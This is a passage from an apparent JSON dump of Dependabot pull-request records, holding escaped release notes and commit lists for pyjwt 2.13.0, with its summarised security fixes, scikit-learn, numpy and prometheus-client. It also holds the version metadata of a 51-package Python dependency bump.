few behavioral changes you may encounter:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eEmpty HMAC keys now raise.\u003c/strong\u003e If your app passed \u003ccode\u003e\u0026quot;\u0026quot;\u003c/code\u003e or \u003ccode\u003eb\u0026quot;\u0026quot;\u003c/code\u003e as a secret (often via a missing env var, e.g. \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e), \u003ccode\u003eencode\u003c/code\u003e/\u003ccode\u003edecode\u003c/code\u003e will now raise \u003ccode\u003eInvalidKeyError\u003c/code\u003e. This is the intended behavior — fix the configuration.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWK\u003c/code\u003e decoding now requires the token's \u003ccode\u003ealg\u003c/code\u003e to match the JWK's algorithm.\u003c/strong\u003e Previously a mismatch was silently honored if the header \u003ccode\u003ealg\u003c/code\u003e appeared in the allow-list. Tokens that relied on this mismatch will now fail with \u003ccode\u003eInvalidAlgorithmError\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects non-HTTP(S) URIs at construction time.\u003c/strong\u003e Tests or dev environments that fetched JWKS from \u003ccode\u003efile://\u003c/code\u003e URIs need to switch to a local HTTP server or load the JWKS by other means (e.g. construct \u003ccode\u003ePyJWKSet.from_dict(...)\u003c/code\u003e directly).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eb64=false\u003c/code\u003e tokens are now strictly RFC 7515 / 7797 compliant.\u003c/strong\u003e Tokens with a non-empty compact-form payload segment, or that omit \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e from \u003ccode\u003ecrit\u003c/code\u003e, will be rejected. PyJWT-produced tokens always satisfy both invariants, so round-trips through PyJWT are unaffected.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e set per-call now takes effect.\u003c/strong\u003e Callers who passed \u003ccode\u003eoptions={\u0026quot;enforce_minimum_key_length\u0026quot;: True}\u003c/code\u003e to \u003ccode\u003ejwt.decode()\u003c/code\u003e previously got no enforcement; they will now get \u003ccode\u003eInvalidKeyError\u003c/code\u003e on undersized keys, as documented.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull changelog:\u003c/strong\u003e \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\"\u003ehttps://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/blob/master/CHANGELOG.rst\"\u003epyjwt's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ccode\u003ev2.13.0 \u0026lt;https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u0026gt;\u003c/code\u003e__\u003c/h2\u003e\n\u003cp\u003eSecurity\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject JWK JSON documents passed as raw HMAC secrets in\n  ``HMACAlgorithm.prepare_key`` to close an algorithm-confusion gap that\n  the existing PEM/SSH guard did not cover. Reported by @aradona91 in\n  `GHSA-xgmm-8j9v-c9wx \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\u0026gt;`__.\n- Bind the JWT header ``alg`` to ``PyJWK.algorithm_name`` during\n  verification so the caller's ``algorithms=[...]`` allow-list cannot be\n  bypassed when decoding with a ``PyJWK`` / ``PyJWKClient`` key. Reported\n  by @sushi-gif in `GHSA-jq35-7prp-9v3f \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\u0026gt;`__.\n- Reject non-``http(s)`` URI schemes in ``PyJWKClient`` so attacker-\n  influenced URIs cannot read local files or reach unintended schemes via\n  urllib's default ``file://`` / ``ftp://`` / ``data:`` handlers. Reported\n  by @KEIJOT in `GHSA-993g-76c3-p5m4 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\u0026gt;`__.\n- Preserve the cached JWK Set on fetch errors in ``PyJWKClient.fetch_data``.\n  The previous ``finally``-block ``put(None)`` pattern cleared the cache\n  on any transient outage, turning one bad JWKS request into application-\n  wide auth failure. Reported by @eddieran in `GHSA-fhv5-28vv-h8m8 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\u0026gt;`__.\n- Skip the unconditional base64 decode of the compact-form payload segment\n  when ``b64=false`` is set in the protected header, and require that\n  segment to be empty (RFC 7515 Appendix F detached form). Closes an\n  unauthenticated DoS amplifier. Reported by @thesmartshadow in\n  `GHSA-w7vc-732c-9m39 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\u0026gt;`__.\n\u003cp\u003eFixed\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject empty HMAC keys outright in ``HMACAlgorithm.prepare_key`` with\n  ``InvalidKeyError`` instead of accepting them with only a warning.\n  Thanks to @SnailSploit and @spartan8806 for independently flagging the\n  footgun.\n- Forward per-call ``options`` (including ``enforce_minimum_key_length``)\n  from ``PyJWT.decode`` through to ``PyJWS._verify_signature`` so the\n  option actually takes effect when set at the call site rather than only\n  on the ``PyJWT`` instance. Thanks to @WLUB for the report.\n- RFC 7797 §3 compliance for ``b64=false``: the encoder now auto-adds\n  ``\u0026amp;quot;b64\u0026amp;quot;`` to the ``crit`` header parameter, and the decoder rejects\n  tokens that set ``b64=false`` without listing it in ``crit``. Thanks to\n  @MachineLearning-Nerd for the report.\n\nChanged\n\u003c/code\u003e\u003c/pre\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ccode\u003e[#1152](https://github.com/jpadilla/pyjwt/issues/1152) \u0026amp;lt;https://github.com/jpadilla/pyjwt/pull/1152\u0026amp;gt;\u003c/code\u003e__\n\u003c/code\u003e\u003c/pre\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/7144e4534c34810f4525dc4578a32addd8212cff\"\u003e\u003ccode\u003e7144e45\u003c/code\u003e\u003c/a\u003e Apply ruff format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/d2f4bec4963897c0ef96ef64a875894f2c8542ab\"\u003e\u003ccode\u003ed2f4bec\u003c/code\u003e\u003c/a\u003e Restore \u003ccode\u003ecast()\u003c/code\u003e calls with cross-version \u003ccode\u003etype: ignore\u003c/code\u003e for \u003ccode\u003eprepare_key\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/22f478cebddd8294259c30f037ecb92b0b348774\"\u003e\u003ccode\u003e22f478c\u003c/code\u003e\u003c/a\u003e Remove redundant casts in \u003ccode\u003eRSAAlgorithm.prepare_key\u003c/code\u003e and `ECAlgorithm.prepare...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/95791b1759b8aa4f2203575d344d5c78564cdc81\"\u003e\u003ccode\u003e95791b1\u003c/code\u003e\u003c/a\u003e Bundle security fixes and hardening into 2.13.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/dcc27a9d3182a2349c30b160758785c6ce7a6508\"\u003e\u003ccode\u003edcc27a9\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1155\"\u003e#1155\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/9d08a9a1896845ed8eaf88e6f6ac61e5800c3e7a\"\u003e\u003ccode\u003e9d08a9a\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1146\"\u003e#1146\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/b87c10014d4109f0214fea188d00faaaf8a80e64\"\u003e\u003ccode\u003eb87c100\u003c/code\u003e\u003c/a\u003e Bump codecov/codecov-action from 5 to 6 (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1154\"\u003e#1154\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/40e3147eb5f790d8d041772e5fc00728a176c812\"\u003e\u003ccode\u003e40e3147\u003c/code\u003e\u003c/a\u003e Migrate development extras to dependency groups (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1152\"\u003e#1152\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `scikit-learn` from 1.8.0 to 1.9.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/scikit-learn/scikit-learn/releases\"\u003escikit-learn's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eScikit-learn 1.9.0\u003c/h2\u003e\n\u003cp\u003eWe're happy to announce the 1.9.0 release.\u003c/p\u003e\n\u003cp\u003eYou can read the release highlights under \u003ca href=\"https://scikit-learn.org/stable/auto_examples/release_highlights/plot_release_highlights_1_9_0.html\"\u003ehttps://scikit-learn.org/stable/auto_examples/release_highlights/plot_release_highlights_1_9_0.html\u003c/a\u003e and the long version of the change log under \u003ca href=\"https://scikit-learn.org/stable/whats_new/v1.9.html\"\u003ehttps://scikit-learn.org/stable/whats_new/v1.9.html\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eThis release adds \u003ca href=\"https://narwhals-dev.github.io/narwhals/\"\u003enarwhals\u003c/a\u003e as a new dependency that will help to improve dataframe interoperability across the project.\u003c/p\u003e\n\u003cp\u003eThis version supports Python versions 3.11 to 3.14.\u003c/p\u003e\n\u003cp\u003eYou can upgrade with pip as usual:\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003epip install -U scikit-learn\r\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eThe conda-forge builds can be installed using:\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003econda install -c conda-forge scikit-learn\r\n\u003c/code\u003e\u003c/pre\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/scikit-learn/scikit-learn/commit/77def0ed6e3beab57244885d2a584470e96c103d\"\u003e\u003ccode\u003e77def0e\u003c/code\u003e\u003c/a\u003e trigger wheel builder [cd build]\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/scikit-learn/scikit-learn/commit/ee7c0b0e34ffe0f5eff8c7aeda49783f70bd9faa\"\u003e\u003ccode\u003eee7c0b0\u003c/code\u003e\u003c/a\u003e generate changelog\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/scikit-learn/scikit-learn/commit/3d7fb048fc5f05555a202d2b24307628841904b5\"\u003e\u003ccode\u003e3d7fb04\u003c/code\u003e\u003c/a\u003e bump version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/scikit-learn/scikit-learn/commit/8954e7baf1f827320b17817f0ab76d025f5e6421\"\u003e\u003ccode\u003e8954e7b\u003c/code\u003e\u003c/a\u003e DOC Release highlights for 1.9 (\u003ca href=\"https://redirect.github.com/scikit-learn/scikit-learn/issues/34147\"\u003e#34147\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/scikit-learn/scikit-learn/commit/73a3eab9d7bc58b695e4da8765044815b90b8dee\"\u003e\u003ccode\u003e73a3eab\u003c/code\u003e\u003c/a\u003e Fix: Array-API - avoid failing for numpy fit + predict with sparse or array-l...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/scikit-learn/scikit-learn/commit/8839aaeb2fa2a4e3ad2f0a5a69b5f427cffe1dd1\"\u003e\u003ccode\u003e8839aae\u003c/code\u003e\u003c/a\u003e DOC Thread-safety requirement for open_listener message consumer callback (\u003ca href=\"https://redirect.github.com/scikit-learn/scikit-learn/issues/3\"\u003e#3\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/scikit-learn/scikit-learn/commit/4d2476a4e2acc9429b96d8ee80218a96d24c2bde\"\u003e\u003ccode\u003e4d2476a\u003c/code\u003e\u003c/a\u003e DOC Refactor array API docs page (\u003ca href=\"https://redirect.github.com/scikit-learn/scikit-learn/issues/34054\"\u003e#34054\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/scikit-learn/scikit-learn/commit/f9f812fe6a4ea54c482da6b195773917b636365e\"\u003e\u003ccode\u003ef9f812f\u003c/code\u003e\u003c/a\u003e :lock: :robot: CI Update lock files for scipy-dev CI build(s) :lock: :robot: ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/scikit-learn/scikit-learn/commit/d779dc335a31d74ef472003d9012066f07ee8834\"\u003e\u003ccode\u003ed779dc3\u003c/code\u003e\u003c/a\u003e :lock: :robot: CI Update lock files for free-threaded CI build(s) :lock: :rob...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/scikit-learn/scikit-learn/commit/6a03cf0906987ce77b37e780ccdebbe3f85e9235\"\u003e\u003ccode\u003e6a03cf0\u003c/code\u003e\u003c/a\u003e :lock: :robot: CI Update lock files for array-api CI build(s) :lock: :robot: ...\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/scikit-learn/scikit-learn/compare/1.8.0...1.9.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `numpy` from 2.4.5 to 2.4.6\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/numpy/numpy/releases\"\u003enumpy's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.4.6 (May 18, 2026)\u003c/h2\u003e\n\u003ch1\u003eNumPy 2.4.6 Release Notes\u003c/h1\u003e\n\u003cp\u003eNumPy 2.4.6 is a quick release that fixes a regression discovered in the 2.4.5\nrelease.\u003c/p\u003e\n\u003cp\u003eThis release supports Python versions 3.11-3.14\u003c/p\u003e\n\u003ch2\u003eContributors\u003c/h2\u003e\n\u003cp\u003eA total of 4 people contributed to this release. People with a \u0026quot;+\u0026quot; by their\nnames contributed a patch for the first time.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e!EarlMilktea\u003c/li\u003e\n\u003cli\u003eCharles Harris\u003c/li\u003e\n\u003cli\u003eSebastian Berg\u003c/li\u003e\n\u003cli\u003eWarren Weckesser\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ePull requests merged\u003c/h2\u003e\n\u003cp\u003eA total of 4 pull requests were merged for this release.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/numpy/numpy/pull/31444\"\u003e#31444\u003c/a\u003e: MAINT: Prepare 2.4.x for further development\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/numpy/numpy/pull/31453\"\u003e#31453\u003c/a\u003e: BUG: Fix regression in \u003ccode\u003earr.conj()\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/numpy/numpy/pull/31459\"\u003e#31459\u003c/a\u003e: BUG: \u003ccode\u003enp.linalg.svd(..., hermitian=True)\u003c/code\u003e returns non-unitary...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/numpy/numpy/pull/31460\"\u003e#31460\u003c/a\u003e: BUG: Don't call INCREF/DECREF on descr in NpyStringAcquireAllocator...\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/b832a09cf2a169c833dd2371e7c07aa00b293242\"\u003e\u003ccode\u003eb832a09\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/numpy/numpy/issues/31462\"\u003e#31462\u003c/a\u003e from charris/prepare-2.4.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/57cc147d2ceacffc6534642bfbdebb3a80428e1e\"\u003e\u003ccode\u003e57cc147\u003c/code\u003e\u003c/a\u003e REL: Prepare for the NumPy 2.4.6 release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/0c72b0b53b6b83c004e434b2c7855e73c000d21e\"\u003e\u003ccode\u003e0c72b0b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/numpy/numpy/issues/31459\"\u003e#31459\u003c/a\u003e from charris/backport-31347\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/9778d26e0475d381ccb7817c3b4dd8cacef2b9eb\"\u003e\u003ccode\u003e9778d26\u003c/code\u003e\u003c/a\u003e BUG: core: Don't call INCREF/DECREF on descr in NpyStringAcquireAllocator. (#...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/e0e38767d5d0f848ab44befeedcad71e8ef589c7\"\u003e\u003ccode\u003ee0e3876\u003c/code\u003e\u003c/a\u003e BUG: core: Don't call INCREF/DECREF on descr in NpyStringAcquireAllocator. (#...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/d1bffeb9ec4ec0bf029c94ea35abffa92d5c30f2\"\u003e\u003ccode\u003ed1bffeb\u003c/code\u003e\u003c/a\u003e BUG: \u003ccode\u003enp.linalg.svd(..., hermitian=True)\u003c/code\u003e returns non-unitary \u003ccode\u003evh\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/numpy/numpy/issues/31347\"\u003e#31347\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/8d8d7e5a14a1da0bfb0faf609a7a7610c431e6e9\"\u003e\u003ccode\u003e8d8d7e5\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/numpy/numpy/issues/31453\"\u003e#31453\u003c/a\u003e from seberg/issue-31452\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/bddaab7ace45f90148d8f2bb6e67daab2d45ec76\"\u003e\u003ccode\u003ebddaab7\u003c/code\u003e\u003c/a\u003e BUG: Fix regression in \u003ccode\u003earr.conj()\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/37a1ecca8dff09b2c579a991194ac55b9971f3a7\"\u003e\u003ccode\u003e37a1ecc\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/numpy/numpy/issues/31444\"\u003e#31444\u003c/a\u003e from charris/begin-2.4.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/numpy/numpy/commit/3c0e043217a759a8a948ade158fec14348c3b459\"\u003e\u003ccode\u003e3c0e043\u003c/code\u003e\u003c/a\u003e MAINT: Prepare 2.4.x for further development\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/numpy/numpy/compare/v2.4.5...v2.4.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `prometheus-client` from 0.21.1 to 0.25.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/prometheus/client_python/releases\"\u003eprometheus-client's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.25.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix spaces in grouping key values for push_to_gateway by \u003ca href=\"https://github.com/veeceey\"\u003e\u003ccode\u003e@​veeceey\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/prometheus/client_python/pull/1156\"\u003eprometheus/client_python#1156\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSupport MultiProcessCollector in RestrictedRegistry by \u003ca href=\"https://github.com/mathias-kende\"\u003e\u003ccode\u003e@​mathias-kende\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/prometheus/client_python/pull/1150\"\u003eprometheus/client_python#1150\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/prometheus/client_python/compare/v0.24.1...v0.25.0\"\u003ehttps://github.com/prometheus/client_python/compare/v0.24.1...v0.25.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.24.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Django] Pass correct registry to MultiProcessCollector by \u003ca href=\"https://github.com/jelly\"\u003e\u003ccode\u003e@​jelly\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/prometheus/client_python/pull/1152\"\u003eprometheus/client_python#1152\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.24.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd an AIOHTTP exporter by \u003ca href=\"https://github.com/Lexicality\"\u003e\u003ccode\u003e@​Lexicality\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/prometheus/client_python/pull/1139\"\u003eprometheus/client_python#1139\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd remove_m...\n\n_Description has been truncated_","html_url":"https://github.com/AlexMatei1/honey-strike/pull/12","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/AlexMatei1%2Fhoney-strike/issues/12","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/12/packages"},{"uuid":"4608885696","node_id":"PR_kwDORQ8Eq87jsrVd","number":87,"state":"open","title":"chore(deps): bump the python-minor-patch group across 1 directory with 51 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":2,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-06-07T22:11:12.000Z","updated_at":"2026-06-08T01:04:54.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"python-minor-patch","update_count":51,"packages":[{"name":"numpy","old_version":"2.4.4","new_version":"2.4.6","repository_url":"https://github.com/numpy/numpy"},{"name":"requests","old_version":"2.33.1","new_version":"2.34.2","repository_url":"https://github.com/psf/requests"},{"name":"torch","old_version":"2.11.0","new_version":"2.12.0","repository_url":"https://github.com/pytorch/pytorch"},{"name":"transformers","old_version":"5.7.0","new_version":"5.10.2","repository_url":"https://github.com/huggingface/transformers"},{"name":"sentence-transformers","old_version":"5.4.1","new_version":"5.5.1","repository_url":"https://github.com/huggingface/sentence-transformers"},{"name":"openai","old_version":"2.32.0","new_version":"2.41.0","repository_url":"https://github.com/openai/openai-python"},{"name":"anthropic","old_version":"0.96.0","new_version":"0.107.1","repository_url":"https://github.com/anthropics/anthropic-sdk-python"},{"name":"langchain-core","old_version":"1.4.0","new_version":"1.4.1","repository_url":"https://github.com/langchain-ai/langchain"},{"name":"langsmith","old_version":"0.8.4","new_version":"0.8.9","repository_url":"https://github.com/langchain-ai/langsmith-sdk"},{"name":"llama-index-core","old_version":"0.14.20","new_version":"0.14.22","repository_url":"https://github.com/run-llama/llama_index"},{"name":"fastapi","old_version":"0.136.0","new_version":"0.136.3","repository_url":"https://github.com/fastapi/fastapi"},{"name":"uvicorn","old_version":"0.44.0","new_version":"0.49.0","repository_url":"https://github.com/Kludex/uvicorn"},{"name":"pydantic","old_version":"2.13.1","new_version":"2.13.4","repository_url":"https://github.com/pydantic/pydantic"},{"name":"python-multipart","old_version":"0.0.28","new_version":"0.0.32","repository_url":"https://github.com/Kludex/python-multipart"},{"name":"elevenlabs","old_version":"2.43.0","new_version":"2.51.0","repository_url":"https://github.com/elevenlabs/elevenlabs-python"},{"name":"onnxruntime","old_version":"1.22.0","new_version":"1.26.0","repository_url":"https://github.com/microsoft/onnxruntime"},{"name":"onnxruntime-gpu","old_version":"1.24.4","new_version":"1.26.0","repository_url":"https://github.com/microsoft/onnxruntime"},{"name":"grpcio","old_version":"1.78.0","new_version":"1.81.0","repository_url":"https://github.com/grpc/grpc"},{"name":"grpcio-tools","old_version":"1.78.0","new_version":"1.81.0","repository_url":"https://github.com/grpc/grpc"},{"name":"mujoco","old_version":"3.8.0","new_version":"3.9.0","repository_url":"https://github.com/google-deepmind/mujoco"},{"name":"scikit-learn","old_version":"1.6.1","new_version":"1.9.0","repository_url":"https://github.com/scikit-learn/scikit-learn"},{"name":"qdrant-client","old_version":"1.17.1","new_version":"1.18.0","repository_url":"https://github.com/qdrant/qdrant-client"},{"name":"faiss-cpu","old_version":"1.13.2","new_version":"1.14.2","repository_url":"https://github.com/facebookresearch/faiss"},{"name":"polar-sdk","old_version":"0.31.3","new_version":"0.31.5","repository_url":"https://github.com/polarsource/polar-python"},{"name":"langgraph","old_version":"1.1.6","new_version":"1.2.4","repository_url":"https://github.com/langchain-ai/langgraph"},{"name":"haystack-ai","old_version":"2.27.0","new_version":"2.30.0","repository_url":"https://github.com/deepset-ai/haystack"},{"name":"litellm","old_version":"1.86.2","new_version":"1.88.0","repository_url":"https://github.com/BerriAI/litellm"},{"name":"mkdocs-jupyter","old_version":"0.26.2","new_version":"0.26.3","repository_url":"https://github.com/danielfrg/mkdocs-jupyter"},{"name":"opentelemetry-api","old_version":"1.41.0","new_version":"1.42.1","repository_url":"https://github.com/open-telemetry/opentelemetry-python"},{"name":"langfuse","old_version":"4.3.1","new_version":"4.7.1","repository_url":"https://github.com/langfuse/langfuse"},{"name":"gradio","old_version":"6.13.0","new_version":"6.16.0","repository_url":"https://github.com/gradio-app/gradio"},{"name":"pypdf","old_version":"6.10.2","new_version":"6.13.0","repository_url":"https://github.com/py-pdf/pypdf"},{"name":"beautifulsoup4","old_version":"4.14.3","new_version":"4.15.0"},{"name":"boto3","old_version":"1.42.90","new_version":"1.43.24","repository_url":"https://github.com/boto/boto3"},{"name":"notion-client","old_version":"3.0.0","new_version":"3.1.0","repository_url":"https://github.com/ramnes/notion-sdk-py"},{"name":"google-api-python-client","old_version":"2.194.0","new_version":"2.197.0","repository_url":"https://github.com/googleapis/google-api-python-client"},{"name":"pyjwt","old_version":"2.12.1","new_version":"2.13.0","repository_url":"https://github.com/jpadilla/pyjwt"},{"name":"psycopg2-binary","old_version":"2.9.11","new_version":"2.9.12","repository_url":"https://github.com/psycopg/psycopg2"},{"name":"google-cloud-aiplatform","old_version":"1.149.0","new_version":"1.156.0","repository_url":"https://github.com/googleapis/python-aiplatform"},{"name":"hypothesis","old_version":"6.151.10","new_version":"6.155.2","repository_url":"https://github.com/HypothesisWorks/hypothesis"},{"name":"pytest-asyncio","old_version":"1.3.0","new_version":"1.4.0","repository_url":"https://github.com/pytest-dev/pytest-asyncio"},{"name":"ruff","old_version":"0.15.11","new_version":"0.15.16","repository_url":"https://github.com/astral-sh/ruff"},{"name":"build","old_version":"1.4.3","new_version":"1.5.0","repository_url":"https://github.com/pypa/build"},{"name":"aiohappyeyeballs","old_version":"2.6.1","new_version":"2.6.2","repository_url":"https://github.com/aio-libs/aiohappyeyeballs"},{"name":"anyio","old_version":"4.12.1","new_version":"4.13.0","repository_url":"https://github.com/agronholm/anyio"},{"name":"certifi","old_version":"2026.2.25","new_version":"2026.5.20","repository_url":"https://github.com/certifi/python-certifi"},{"name":"huggingface-hub","old_version":"1.12.0","new_version":"1.18.0","repository_url":"https://github.com/huggingface/huggingface_hub"},{"name":"idna","old_version":"3.15","new_version":"3.18","repository_url":"https://github.com/kjd/idna"},{"name":"propcache","old_version":"0.4.1","new_version":"0.5.2","repository_url":"https://github.com/a